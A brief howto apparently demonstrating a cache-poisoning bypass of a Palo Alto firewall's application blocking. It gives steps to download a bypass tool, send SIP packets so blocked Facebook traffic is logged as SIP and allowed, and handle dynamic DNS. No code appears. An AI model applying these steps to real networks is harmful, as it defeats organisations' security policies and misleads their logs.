PAN Bypass Step By Step HOWTO

1. Download pan_bypasser from here http://goo.gl/9ulSY
2. Edit the sip.txt and the pan_bypass.bat to reflect the FQDN you are poisoning (e.g www.facebook.com)
3. Make sure the PAN box is at the latest version

4. Create 3 rules as follows:


• The first rule blocks access to facebook app.
• The second rule allows access to the internet for the LAN network
• The third rule is the Clean-up rule

5. Test the policy and make sure access to facebook is blocked


6. Run the file pan_bypass.bat from the client machine effectively poisoning the cache with SIP packets


You can see that the cache was populated by running “show running application cache” on the PAN machine



7. Now when you go to www.facebook.com the connection should succeed



You can see that the PAN box mistakenly put in LOG the access to facebook.com as SIP packets due to the “Cache Poisoning Attack”


Quod Erat Demonstrandum

note:
Since the cache attack is based on Dest. Ip address/port and not FQDN it will be more challenging with domains the resolves dynamically (i.e www.facebook.com)
You can either static resolve using hosts file or run it on all the ip addresses